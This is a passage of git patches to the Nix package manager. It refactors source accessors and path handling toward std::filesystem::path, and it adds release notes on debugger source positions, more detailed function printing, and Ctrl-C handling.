state->parseExprFromString(std::move(s), state->rootPath("."), staticEnv); } diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 43f8dea07..eb1b3a5f0 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -434,14 +434,14 @@ EvalState::EvalState( , emptyBindings(0) , rootFS( evalSettings.restrictEval || evalSettings.pureEval - ? ref(AllowListInputAccessor::create(makeFSInputAccessor(CanonPath::root), {}, + ? ref(AllowListInputAccessor::create(makeFSInputAccessor(), {}, [](const CanonPath & path) -> RestrictedPathError { auto modeInformation = evalSettings.pureEval ? "in pure evaluation mode (use '--impure' to override)" : "in restricted mode"; throw RestrictedPathError("access to absolute path '%1%' is forbidden %2%", path, modeInformation); })) - : makeFSInputAccessor(CanonPath::root)) + : makeFSInputAccessor()) , corepkgsFS(makeMemoryInputAccessor()) , internalFS(makeMemoryInputAccessor()) , derivationInternal{corepkgsFS->addFile( @@ -2763,7 +2763,7 @@ Expr * EvalState::parseStdin() // drainFD should have left some extra space for terminators buffer.append("\0\0", 2); auto s = make_ref(std::move(buffer)); - return parse(s->data(), s->size(), Pos::Stdin{.source = s}, rootPath(CanonPath::fromCwd()), staticBaseEnv); + return parse(s->data(), s->size(), Pos::Stdin{.source = s}, rootPath("."), staticBaseEnv); } diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index 2368187b1..b75646dbd 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -372,6 +372,11 @@ public: */ SourcePath rootPath(CanonPath path); + /** + * Variant which accepts relative paths too. + */ + SourcePath rootPath(PathView path); + /** * Allow access to a path. 
*/ diff --git a/src/libexpr/paths.cc b/src/libexpr/paths.cc index 099607638..50d0d9895 100644 --- a/src/libexpr/paths.cc +++ b/src/libexpr/paths.cc @@ -1,5 +1,4 @@ #include "eval.hh" -#include "fs-input-accessor.hh" namespace nix { @@ -8,4 +7,9 @@ SourcePath EvalState::rootPath(CanonPath path) return {rootFS, std::move(path)}; } +SourcePath EvalState::rootPath(PathView path) +{ + return {rootFS, CanonPath(absPath(path))}; +} + } diff --git a/src/libfetchers/fs-input-accessor.cc b/src/libfetchers/fs-input-accessor.cc index 46bc6b70d..ee24c621a 100644 --- a/src/libfetchers/fs-input-accessor.cc +++ b/src/libfetchers/fs-input-accessor.cc @@ -6,72 +6,30 @@ namespace nix { struct FSInputAccessor : InputAccessor, PosixSourceAccessor { - CanonPath root; - - FSInputAccessor(const CanonPath & root) - : root(root) - { - displayPrefix = root.isRoot() ? "" : root.abs(); - } - - void readFile( - const CanonPath & path, - Sink & sink, - std::function sizeCallback) override - { - auto absPath = makeAbsPath(path); - PosixSourceAccessor::readFile(absPath, sink, sizeCallback); - } - - bool pathExists(const CanonPath & path) override - { - return PosixSourceAccessor::pathExists(makeAbsPath(path)); - } - - std::optional maybeLstat(const CanonPath & path) override - { - return PosixSourceAccessor::maybeLstat(makeAbsPath(path)); - } - - DirEntries readDirectory(const CanonPath & path) override - { - DirEntries res; - for (auto & entry : PosixSourceAccessor::readDirectory(makeAbsPath(path))) - res.emplace(entry); - return res; - } - - std::string readLink(const CanonPath & path) override - { - return PosixSourceAccessor::readLink(makeAbsPath(path)); - } - - CanonPath makeAbsPath(const CanonPath & path) - { - return root / path; - } - - std::optional getPhysicalPath(const CanonPath & path) override - { - return makeAbsPath(path); - } + using PosixSourceAccessor::PosixSourceAccessor; }; -ref makeFSInputAccessor(const CanonPath & root) +ref makeFSInputAccessor() { - return make_ref(root); + 
return make_ref(); +} + +ref makeFSInputAccessor(std::filesystem::path root) +{ + return make_ref(std::move(root)); } ref makeStorePathAccessor( ref store, const StorePath & storePath) { - return makeFSInputAccessor(CanonPath(store->toRealPath(storePath))); + // FIXME: should use `store->getFSAccessor()` + return makeFSInputAccessor(std::filesystem::path { store->toRealPath(storePath) }); } SourcePath getUnfilteredRootPath(CanonPath path) { - static auto rootFS = makeFSInputAccessor(CanonPath::root); + static auto rootFS = makeFSInputAccessor(); return {rootFS, path}; } diff --git a/src/libfetchers/fs-input-accessor.hh b/src/libfetchers/fs-input-accessor.hh index a98e83511..e60906bd8 100644 --- a/src/libfetchers/fs-input-accessor.hh +++ b/src/libfetchers/fs-input-accessor.hh @@ -8,8 +8,9 @@ namespace nix { class StorePath; class Store; -ref makeFSInputAccessor( - const CanonPath & root); +ref makeFSInputAccessor(); + +ref makeFSInputAccessor(std::filesystem::path root); ref makeStorePathAccessor( ref store, diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index 1256a4c2c..cb4a84e53 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -140,15 +140,15 @@ T peelObject(git_repository * repo, git_object * obj, git_object_t type) struct GitRepoImpl : GitRepo, std::enable_shared_from_this { /** Location of the repository on disk. 
*/ - CanonPath path; + std::filesystem::path path; Repository repo; - GitRepoImpl(CanonPath _path, bool create, bool bare) + GitRepoImpl(std::filesystem::path _path, bool create, bool bare) : path(std::move(_path)) { initLibGit2(); - if (pathExists(path.abs())) { + if (pathExists(path.native())) { if (git_repository_open(Setter(repo), path.c_str())) throw Error("opening Git repository '%s': %s", path, git_error_last()->message); } else { @@ -221,10 +221,10 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this return toHash(*oid); } - std::vector parseSubmodules(const CanonPath & configFile) + std::vector parseSubmodules(const std::filesystem::path & configFile) { GitConfig config; - if (git_config_open_ondisk(Setter(config), configFile.abs().c_str())) + if (git_config_open_ondisk(Setter(config), configFile.c_str())) throw Error("parsing .gitmodules file: %s", git_error_last()->message); ConfigIterator it; @@ -296,7 +296,7 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this /* Get submodule info. 
*/ auto modulesFile = path / ".gitmodules"; - if (pathExists(modulesFile.abs())) + if (pathExists(modulesFile)) info.submodules = parseSubmodules(modulesFile); return info; @@ -389,10 +389,10 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this auto dir = this->path; Strings gitArgs; if (shallow) { - gitArgs = { "-C", dir.abs(), "fetch", "--quiet", "--force", "--depth", "1", "--", url, refspec }; + gitArgs = { "-C", dir, "fetch", "--quiet", "--force", "--depth", "1", "--", url, refspec }; } else { - gitArgs = { "-C", dir.abs(), "fetch", "--quiet", "--force", "--", url, refspec }; + gitArgs = { "-C", dir, "fetch", "--quiet", "--force", "--", url, refspec }; } runProgram(RunOptions { @@ -438,7 +438,7 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this .args = { "-c", "gpg.ssh.allowedSignersFile=" + allowedSignersFile, - "-C", path.abs(), + "-C", path, "verify-commit", rev.gitRev() }, @@ -465,7 +465,7 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this } }; -ref GitRepo::openRepo(const CanonPath & path, bool create, bool bare) +ref GitRepo::openRepo(const std::filesystem::path & path, bool create, bool bare) { return make_ref(path, create, bare); } @@ -781,7 +781,7 @@ std::vector> GitRepoImpl::getSubmodules auto rawAccessor = getRawAccessor(rev); - for (auto & submodule : parseSubmodules(CanonPath(pathTemp))) { + for (auto & submodule : parseSubmodules(pathTemp)) { auto rev = rawAccessor->getSubmoduleRev(submodule.path); result.push_back({std::move(submodule), rev}); } diff --git a/src/libfetchers/git-utils.hh b/src/libfetchers/git-utils.hh index 768554780..e55affb12 100644 --- a/src/libfetchers/git-utils.hh +++ b/src/libfetchers/git-utils.hh @@ -12,7 +12,7 @@ struct GitRepo virtual ~GitRepo() { } - static ref openRepo(const CanonPath & path, bool create = false, bool bare = false); + static ref openRepo(const std::filesystem::path & path, bool create = false, bool bare = false); virtual uint64_t getRevCount(const Hash & rev) = 0; diff 
--git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index 26fe79596..bef945d54 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -415,7 +415,7 @@ struct GitInputScheme : InputScheme // If this is a local directory and no ref or revision is // given, then allow the use of an unclean working tree. if (!input.getRef() && !input.getRev() && repoInfo.isLocal) - repoInfo.workdirInfo = GitRepo::openRepo(CanonPath(repoInfo.url))->getWorkdirInfo(); + repoInfo.workdirInfo = GitRepo::openRepo(repoInfo.url)->getWorkdirInfo(); return repoInfo; } @@ -429,7 +429,7 @@ struct GitInputScheme : InputScheme if (auto res = cache->lookup(key)) return getIntAttr(*res, "lastModified"); - auto lastModified = GitRepo::openRepo(CanonPath(repoDir))->getLastModified(rev); + auto lastModified = GitRepo::openRepo(repoDir)->getLastModified(rev); cache->upsert(key, Attrs{{"lastModified", lastModified}}); @@ -447,7 +447,7 @@ struct GitInputScheme : InputScheme Activity act(*logger, lvlChatty, actUnknown, fmt("getting Git revision count of '%s'", repoInfo.url)); - auto revCount = GitRepo::openRepo(CanonPath(repoDir))->getRevCount(rev); + auto revCount = GitRepo::openRepo(repoDir)->getRevCount(rev); cache->upsert(key, Attrs{{"revCount", revCount}}); @@ -457,7 +457,7 @@ struct GitInputScheme : InputScheme std::string getDefaultRef(const RepoInfo & repoInfo) const { auto head = repoInfo.isLocal - ? GitRepo::openRepo(CanonPath(repoInfo.url))->getWorkdirRef() + ? 
GitRepo::openRepo(repoInfo.url)->getWorkdirRef() : readHeadCached(repoInfo.url); if (!head) { warn("could not read HEAD ref from repo at '%s', using 'master'", repoInfo.url); @@ -510,7 +510,7 @@ struct GitInputScheme : InputScheme if (repoInfo.isLocal) { repoDir = repoInfo.url; if (!input.getRev()) - input.attrs.insert_or_assign("rev", GitRepo::openRepo(CanonPath(repoDir))->resolveRef(ref).gitRev()); + input.attrs.insert_or_assign("rev", GitRepo::openRepo(repoDir)->resolveRef(ref).gitRev()); } else { Path cacheDir = getCachePath(repoInfo.url, getShallowAttr(input)); repoDir = cacheDir; @@ -519,7 +519,7 @@ struct GitInputScheme : InputScheme createDirs(dirOf(cacheDir)); PathLocks cacheDirLock({cacheDir}); - auto repo = GitRepo::openRepo(CanonPath(cacheDir), true, true); + auto repo = GitRepo::openRepo(cacheDir, true, true); Path localRefFile = ref.compare(0, 5, "refs/") == 0 @@ -588,7 +588,7 @@ struct GitInputScheme : InputScheme // cache dir lock is removed at scope end; we will only use read-only operations on specific revisions in the remainder } - auto repo = GitRepo::openRepo(CanonPath(repoDir)); + auto repo = GitRepo::openRepo(repoDir); auto isShallow = repo->isShallow(); @@ -664,7 +664,7 @@ struct GitInputScheme : InputScheme for (auto & submodule : repoInfo.workdirInfo.submodules) repoInfo.workdirInfo.files.insert(submodule.path); - auto repo = GitRepo::openRepo(CanonPath(repoInfo.url), false, false); + auto repo = GitRepo::openRepo(repoInfo.url, false, false); auto exportIgnore = getExportIgnoreAttr(input); @@ -703,7 +703,7 @@ struct GitInputScheme : InputScheme } if (!repoInfo.workdirInfo.isDirty) { - auto repo = GitRepo::openRepo(CanonPath(repoInfo.url)); + auto repo = GitRepo::openRepo(repoInfo.url); if (auto ref = repo->getWorkdirRef()) input.attrs.insert_or_assign("ref", *ref); diff --git a/src/libutil/archive.cc b/src/libutil/archive.cc index b783b29e0..351ee094b 100644 --- a/src/libutil/archive.cc +++ b/src/libutil/archive.cc @@ -110,8 +110,8 @@ void 
SourceAccessor::dumpPath( time_t dumpPathAndGetMtime(const Path & path, Sink & sink, PathFilter & filter) { - PosixSourceAccessor accessor; - accessor.dumpPath(CanonPath::fromCwd(path), sink, filter); + auto [accessor, canonPath] = PosixSourceAccessor::createAtRoot(path); + accessor.dumpPath(canonPath, sink, filter); return accessor.mtime; } diff --git a/src/libutil/canon-path.cc b/src/libutil/canon-path.cc index bf948be5d..1223ba33c 100644 --- a/src/libutil/canon-path.cc +++ b/src/libutil/canon-path.cc @@ -20,11 +20,6 @@ CanonPath::CanonPath(const std::vector & elems) push(s); } -CanonPath CanonPath::fromCwd(std::string_view path) -{ - return CanonPath(unchecked_t(), absPath(path)); -} - std::optional CanonPath::parent() const { if (isRoot()) return std::nullopt; diff --git a/src/libutil/canon-path.hh b/src/libutil/canon-path.hh index fb2d9244b..2f8ff381e 100644 --- a/src/libutil/canon-path.hh +++ b/src/libutil/canon-path.hh @@ -52,8 +52,6 @@ public: */ CanonPath(const std::vector & elems); - static CanonPath fromCwd(std::string_view path = "."); - static CanonPath root; /** diff --git a/src/libutil/posix-source-accessor.cc b/src/libutil/posix-source-accessor.cc index 5f26fa67b..0300de01e 100644 --- a/src/libutil/posix-source-accessor.cc +++ b/src/libutil/posix-source-accessor.cc @@ -6,6 +6,33 @@ namespace nix { +PosixSourceAccessor::PosixSourceAccessor(std::filesystem::path && root) + : root(std::move(root)) +{ + assert(root.empty() || root.is_absolute()); + displayPrefix = root; +} + +PosixSourceAccessor::PosixSourceAccessor() + : PosixSourceAccessor(std::filesystem::path {}) +{ } + +std::pair PosixSourceAccessor::createAtRoot(const std::filesystem::path & path) +{ + std::filesystem::path path2 = absPath(path.native()); + return { + PosixSourceAccessor { path2.root_path() }, + CanonPath { static_cast(path2.relative_path()) }, + }; +} + +std::filesystem::path PosixSourceAccessor::makeAbsPath(const CanonPath & path) +{ + return root.empty() + ? 
(std::filesystem::path { path.abs() }) + : root / path.rel(); +} + void PosixSourceAccessor::readFile( const CanonPath & path, Sink & sink, @@ -13,9 +40,11 @@ void PosixSourceAccessor::readFile( { assertNoSymlinks(path); - AutoCloseFD fd = open(path.c_str(), O_RDONLY | O_CLOEXEC | O_NOFOLLOW); + auto ap = makeAbsPath(path); + + AutoCloseFD fd = open(ap.c_str(), O_RDONLY | O_CLOEXEC | O_NOFOLLOW); if (!fd) - throw SysError("opening file '%1%'", path); + throw SysError("opening file '%1%'", ap.native()); struct stat st; if (fstat(fd.get(), &st) == -1) @@ -46,7 +75,7 @@ void PosixSourceAccessor::readFile( bool PosixSourceAccessor::pathExists(const CanonPath & path) { if (auto parent = path.parent()) assertNoSymlinks(*parent); - return nix::pathExists(path.abs()); + return nix::pathExists(makeAbsPath(path)); } std::optional PosixSourceAccessor::cachedLstat(const CanonPath & path) @@ -60,7 +89,7 @@ std::optional PosixSourceAccessor::cachedLstat(const CanonPath & pa } std::optional st{std::in_place}; - if (::lstat(path.c_str(), &*st)) { + if (::lstat(makeAbsPath(path).c_str(), &*st)) { if (errno == ENOENT || errno == ENOTDIR) st.reset(); else @@ -95,7 +124,7 @@ SourceAccessor::DirEntries PosixSourceAccessor::readDirectory(const CanonPath & { assertNoSymlinks(path); DirEntries res; - for (auto & entry : nix::readDirectory(path.abs())) { + for (auto & entry : nix::readDirectory(makeAbsPath(path))) { std::optional type; switch (entry.type) { case DT_REG: type = Type::tRegular; break; @@ -110,12 +139,12 @@ SourceAccessor::DirEntries PosixSourceAccessor::readDirectory(const CanonPath & std::string PosixSourceAccessor::readLink(const CanonPath & path) { if (auto parent = path.parent()) assertNoSymlinks(*parent); - return nix::readLink(path.abs()); + return nix::readLink(makeAbsPath(path)); } -std::optional PosixSourceAccessor::getPhysicalPath(const CanonPath & path) +std::optional PosixSourceAccessor::getPhysicalPath(const CanonPath & path) { - return path; + return 
makeAbsPath(path); } void PosixSourceAccessor::assertNoSymlinks(CanonPath path) diff --git a/src/libutil/posix-source-accessor.hh b/src/libutil/posix-source-accessor.hh index b2bd39805..717c8f017 100644 --- a/src/libutil/posix-source-accessor.hh +++ b/src/libutil/posix-source-accessor.hh @@ -9,6 +9,16 @@ namespace nix { */ struct PosixSourceAccessor : virtual SourceAccessor { + /** + * Optional root path to prefix all operations into the native file + * system. This allows prepending funny things like `C:\` that + * `CanonPath` intentionally doesn't support. + */ + const std::filesystem::path root; + + PosixSourceAccessor(); + PosixSourceAccessor(std::filesystem::path && root); + /** * The most recent mtime seen by lstat(). This is a hack to * support dumpPathAndGetMtime(). Should remove this eventually. @@ -28,7 +38,22 @@ struct PosixSourceAccessor : virtual SourceAccessor std::string readLink(const CanonPath & path) override; - std::optional getPhysicalPath(const CanonPath & path) override; + std::optional getPhysicalPath(const CanonPath & path) override; + + /** + * Create a `PosixSourceAccessor` and `CanonPath` corresponding to + * some native path. + * + * The `PosixSourceAccessor` is rooted as far up the tree as + * possible, (e.g. on Windows it could scoped to a drive like + * `C:\`). This allows more `..` parent accessing to work. + * + * See + * [`std::filesystem::path::root_path`](https://en.cppreference.com/w/cpp/filesystem/path/root_path) + * and + * [`std::filesystem::path::relative_path`](https://en.cppreference.com/w/cpp/filesystem/path/relative_path). 
+ */ + static std::pair createAtRoot(const std::filesystem::path & path); private: @@ -38,6 +63,8 @@ private: void assertNoSymlinks(CanonPath path); std::optional cachedLstat(const CanonPath & path); + + std::filesystem::path makeAbsPath(const CanonPath & path); }; } diff --git a/src/libutil/source-accessor.hh b/src/libutil/source-accessor.hh index 4f4ff09c1..aff7da09c 100644 --- a/src/libutil/source-accessor.hh +++ b/src/libutil/source-accessor.hh @@ -1,5 +1,7 @@ #pragma once +#include + #include "canon-path.hh" #include "hash.hh" @@ -119,7 +121,7 @@ struct SourceAccessor * possible. This is only possible for filesystems that are * materialized in the root filesystem. */ - virtual std::optional getPhysicalPath(const CanonPath & path) + virtual std::optional getPhysicalPath(const CanonPath & path) { return std::nullopt; } bool operator == (const SourceAccessor & x) const diff --git a/src/libutil/source-path.cc b/src/libutil/source-path.cc index 341daf39c..0f154e779 100644 --- a/src/libutil/source-path.cc +++ b/src/libutil/source-path.cc @@ -35,7 +35,7 @@ void SourcePath::dumpPath( PathFilter & filter) const { return accessor->dumpPath(path, sink, filter); } -std::optional SourcePath::getPhysicalPath() const +std::optional SourcePath::getPhysicalPath() const { return accessor->getPhysicalPath(path); } std::string SourcePath::to_string() const diff --git a/src/libutil/source-path.hh b/src/libutil/source-path.hh index bde07b08f..a2f4ddd1e 100644 --- a/src/libutil/source-path.hh +++ b/src/libutil/source-path.hh @@ -82,7 +82,7 @@ struct SourcePath * Return the location of this path in the "real" filesystem, if * it has a physical location. 
*/ - std::optional getPhysicalPath() const; + std::optional getPhysicalPath() const; std::string to_string() const; diff --git a/src/nix-build/nix-build.cc b/src/nix-build/nix-build.cc index 549adfbf7..a372e4b1c 100644 --- a/src/nix-build/nix-build.cc +++ b/src/nix-build/nix-build.cc @@ -299,7 +299,7 @@ static void main_nix_build(int argc, char * * argv) else for (auto i : left) { if (fromArgs) - exprs.push_back(state->parseExprFromString(std::move(i), state->rootPath(CanonPath::fromCwd()))); + exprs.push_back(state->parseExprFromString(std::move(i), state->rootPath("."))); else { auto absolute = i; try { @@ -400,7 +400,7 @@ static void main_nix_build(int argc, char * * argv) try { auto expr = state->parseExprFromString( "(import {}).bashInteractive", - state->rootPath(CanonPath::fromCwd())); + state->rootPath(".")); Value v; state->eval(expr, v); diff --git a/src/nix-env/nix-env.cc b/src/nix-env/nix-env.cc index dfc6e70eb..1f311733b 100644 --- a/src/nix-env/nix-env.cc +++ b/src/nix-env/nix-env.cc @@ -413,7 +413,7 @@ static void queryInstSources(EvalState & state, loadSourceExpr(state, *instSource.nixExprPath, vArg); for (auto & i : args) { - Expr * eFun = state.parseExprFromString(i, state.rootPath(CanonPath::fromCwd())); + Expr * eFun = state.parseExprFromString(i, state.rootPath(".")); Value vFun, vTmp; state.eval(eFun, vFun); vTmp.mkApp(&vFun, &vArg); diff --git a/src/nix-instantiate/nix-instantiate.cc b/src/nix-instantiate/nix-instantiate.cc index b9e626aed..86e6f008d 100644 --- a/src/nix-instantiate/nix-instantiate.cc +++ b/src/nix-instantiate/nix-instantiate.cc @@ -168,7 +168,7 @@ static int main_nix_instantiate(int argc, char * * argv) for (auto & i : files) { auto p = state->findFile(i); if (auto fn = p.getPhysicalPath()) - std::cout << fn->abs() << std::endl; + std::cout << fn->native() << std::endl; else throw Error("'%s' has no physical path", p); } @@ -184,7 +184,7 @@ static int main_nix_instantiate(int argc, char * * argv) for (auto & i : files) { 
Expr * e = fromArgs - ? state->parseExprFromString(i, state->rootPath(CanonPath::fromCwd())) + ? state->parseExprFromString(i, state->rootPath(".")) : state->parseExprFromFile(resolveExprPath(lookupFileArg(*state, i))); processExpr(*state, attrPaths, parseOnly, strict, autoArgs, evalOnly, outputKind, xmlOutputSourceLocation, e); diff --git a/src/nix-store/nix-store.cc b/src/nix-store/nix-store.cc index 40378e123..f6a36da0d 100644 --- a/src/nix-store/nix-store.cc +++ b/src/nix-store/nix-store.cc @@ -176,12 +176,11 @@ static void opAdd(Strings opFlags, Strings opArgs) { if (!opFlags.empty()) throw UsageError("unknown flag"); - PosixSourceAccessor accessor; - for (auto & i : opArgs) + for (auto & i : opArgs) { + auto [accessor, canonPath] = PosixSourceAccessor::createAtRoot(i); cout << fmt("%s\n", store->printStorePath(store->addToStore( - std::string(baseNameOf(i)), - accessor, - CanonPath::fromCwd(i)))); + std::string(baseNameOf(i)), accessor, canonPath))); + } } @@ -201,14 +200,15 @@ static void opAddFixed(Strings opFlags, Strings opArgs) HashAlgorithm hashAlgo = parseHashAlgo(opArgs.front()); opArgs.pop_front(); - PosixSourceAccessor accessor; - for (auto & i : opArgs) + for (auto & i : opArgs) { + auto [accessor, canonPath] = PosixSourceAccessor::createAtRoot(i); std::cout << fmt("%s\n", store->printStorePath(store->addToStoreSlow( baseNameOf(i), accessor, - CanonPath::fromCwd(i), + canonPath, method, hashAlgo).path)); + } } diff --git a/src/nix/add-to-store.cc b/src/nix/add-to-store.cc index 7c534517d..d3e66dc21 100644 --- a/src/nix/add-to-store.cc +++ b/src/nix/add-to-store.cc @@ -60,9 +60,7 @@ struct CmdAddToStore : MixDryRun, StoreCommand { if (!namePart) namePart = baseNameOf(path); - PosixSourceAccessor accessor; - - auto path2 = CanonPath::fromCwd(path); + auto [accessor, path2] = PosixSourceAccessor::createAtRoot(path); auto storePath = dryRun ? 
store->computeStorePath( diff --git a/src/nix/eval.cc b/src/nix/eval.cc index a89fa7412..31b2ccd3c 100644 --- a/src/nix/eval.cc +++ b/src/nix/eval.cc @@ -66,7 +66,7 @@ struct CmdEval : MixJSON, InstallableValueCommand, MixReadOnlyOption if (apply) { auto vApply = state->allocValue(); - state->eval(state->parseExprFromString(*apply, state->rootPath(CanonPath::fromCwd())), *vApply); + state->eval(state->parseExprFromString(*apply, state->rootPath(".")), *vApply); auto vRes = state->allocValue(); state->callFunction(*vApply, *v, *vRes, noPos); v = vRes; diff --git a/src/nix/hash.cc b/src/nix/hash.cc index 4837891c6..eec1c0eae 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -89,8 +89,8 @@ struct CmdHashBase : Command else hashSink = std::make_unique(ha); - PosixSourceAccessor accessor; - dumpPath(accessor, CanonPath::fromCwd(path), *hashSink, mode); + auto [accessor, canonPath] = PosixSourceAccessor::createAtRoot(path); + dumpPath(accessor, canonPath, *hashSink, mode); Hash h = hashSink->finish().first; if (truncate && h.hashSize > 20) h = compressHash(h, 20); diff --git a/src/nix/prefetch.cc b/src/nix/prefetch.cc index 84b79ea28..6e3f878d9 100644 --- a/src/nix/prefetch.cc +++ b/src/nix/prefetch.cc @@ -123,10 +123,9 @@ std::tuple prefetchFile( Activity act(*logger, lvlChatty, actUnknown, fmt("adding '%s' to the store", url)); - PosixSourceAccessor accessor; + auto [accessor, canonPath] = PosixSourceAccessor::createAtRoot(tmpFile); auto info = store->addToStoreSlow( - *name, - accessor, CanonPath::fromCwd(tmpFile), + *name, accessor, canonPath, ingestionMethod, hashAlgo, {}, expectedHash); storePath = info.path; assert(info.ca); From 754c35abfbed653492859136cd41a80b38009e27 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 12:33:05 -0800 Subject: [PATCH 414/654] Add release notes for "Debugger prints source position information" --- doc/manual/rl-next/debugger-positions.md | 25 ++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 
100644 doc/manual/rl-next/debugger-positions.md diff --git a/doc/manual/rl-next/debugger-positions.md b/doc/manual/rl-next/debugger-positions.md new file mode 100644 index 000000000..2fe868413 --- /dev/null +++ b/doc/manual/rl-next/debugger-positions.md @@ -0,0 +1,25 @@ +--- +synopsis: Debugger prints source position information +prs: 9913 +--- + +The `--debugger` now prints source location information, instead of the +pointers of source location information. Before: + +``` +nix-repl> :bt +0: while evaluating the attribute 'python311.pythonForBuild.pkgs' +0x600001522598 +``` + +After: + +``` +0: while evaluating the attribute 'python311.pythonForBuild.pkgs' +/nix/store/hg65h51xnp74ikahns9hyf3py5mlbbqq-source/overrides/default.nix:132:27 + + 131| + 132| bootstrappingBase = pkgs.${self.python.pythonAttr}.pythonForBuild.pkgs; + | ^ + 133| in +``` From 9a5d52262fd83ab11cb36ba2ba91ea27b2389670 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 12:33:31 -0800 Subject: [PATCH 415/654] Add release notes for "Nix no longer attempts to `git add` files that are `.gitignore`d" --- doc/manual/src/release-notes/rl-2.20.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/doc/manual/src/release-notes/rl-2.20.md b/doc/manual/src/release-notes/rl-2.20.md index 26869e90a..5152926e7 100644 --- a/doc/manual/src/release-notes/rl-2.20.md +++ b/doc/manual/src/release-notes/rl-2.20.md @@ -167,3 +167,7 @@ error: expected a set but found an integer ``` +- Flake operations like `nix develop` will no longer fail when run in a Git + repository where the `flake.lock` file is `.gitignore`d + [#8854](https://github.com/NixOS/nix/issues/8854) + [#9324](https://github.com/NixOS/nix/pull/9324) From abb5fef355afc14819c96de08a3687c2257bd10c Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 12:33:58 -0800 Subject: [PATCH 416/654] Add release notes for "Functions are printed with more detail" --- doc/manual/rl-next/lambda-printing.md | 50 +++++++++++++++++++++++++ 
doc/manual/src/release-notes/rl-2.20.md | 19 ++++++++++ 2 files changed, 69 insertions(+) create mode 100644 doc/manual/rl-next/lambda-printing.md diff --git a/doc/manual/rl-next/lambda-printing.md b/doc/manual/rl-next/lambda-printing.md new file mode 100644 index 000000000..3a63f3068 --- /dev/null +++ b/doc/manual/rl-next/lambda-printing.md @@ -0,0 +1,50 @@ +--- +synopsis: Functions are printed with more detail +prs: 9606 +issues: 7145 +--- + +Functions and `builtins` are printed with more detail in `nix repl`, `nix +eval`, `builtins.trace`, and most other places values are printed. + +Before: + +``` +$ nix repl nixpkgs +nix-repl> builtins.map +«primop» + +nix-repl> builtins.map lib.id +«primop-app» + +nix-repl> builtins.trace lib.id "my-value" +trace: +"my-value" + +$ nix eval --file functions.nix +{ id = ; primop = ; primop-app = ; } +``` + +After: + +``` +$ nix repl nixpkgs +nix-repl> builtins.map +«primop map» + +nix-repl> builtins.map lib.id +«partially applied primop map» + +nix-repl> builtins.trace lib.id "my-value" +trace: «lambda id @ /nix/store/8rrzq23h2zq7sv5l2vhw44kls5w0f654-source/lib/trivial.nix:26:5» +"my-value" + +$ nix eval --file functions.nix +{ id = «lambda id @ /Users/wiggles/nix/functions.nix:2:8»; primop = «primop map»; primop-app = «partially applied primop map»; } +``` + +This was actually released in Nix 2.20, but wasn't added to the release notes +so we're announcing it here. The historical release notes have been updated as well. 
+ +[type-error]: https://github.com/NixOS/nix/pull/9753 +[coercion-error]: https://github.com/NixOS/nix/pull/9754 diff --git a/doc/manual/src/release-notes/rl-2.20.md b/doc/manual/src/release-notes/rl-2.20.md index 5152926e7..666d0b4db 100644 --- a/doc/manual/src/release-notes/rl-2.20.md +++ b/doc/manual/src/release-notes/rl-2.20.md @@ -167,6 +167,25 @@ error: expected a set but found an integer ``` + +- Functions are printed with more detail [#7145](https://github.com/NixOS/nix/issues/7145) [#9606](https://github.com/NixOS/nix/pull/9606) + + `nix repl`, `nix eval`, `builtins.trace`, and most other places values are + printed will now include function names and source location information: + + ``` + $ nix repl nixpkgs + nix-repl> builtins.map + «primop map» + + nix-repl> builtins.map lib.id + «partially applied primop map» + + nix-repl> builtins.trace lib.id "my-value" + trace: «lambda id @ /nix/store/8rrzq23h2zq7sv5l2vhw44kls5w0f654-source/lib/trivial.nix:26:5» + "my-value" + ``` + - Flake operations like `nix develop` will no longer fail when run in a Git repository where the `flake.lock` file is `.gitignore`d [#8854](https://github.com/NixOS/nix/issues/8854) From 24cdb81bb043a156346dd9e235e66889567c5fdc Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 12:34:14 -0800 Subject: [PATCH 417/654] Add release notes for "Nix commands respect Ctrl-C" --- doc/manual/rl-next/more-commands-respect-ctrl-c.md | 13 +++++++++++++ doc/manual/src/release-notes/rl-2.20.md | 10 ++++++++++ 2 files changed, 23 insertions(+) create mode 100644 doc/manual/rl-next/more-commands-respect-ctrl-c.md diff --git a/doc/manual/rl-next/more-commands-respect-ctrl-c.md b/doc/manual/rl-next/more-commands-respect-ctrl-c.md new file mode 100644 index 000000000..948930c96 --- /dev/null +++ b/doc/manual/rl-next/more-commands-respect-ctrl-c.md @@ -0,0 +1,13 @@ +--- +synopsis: Nix commands respect Ctrl-C +prs: 9687 6995 +issues: 7245 +--- + +Previously, many Nix commands would hang 
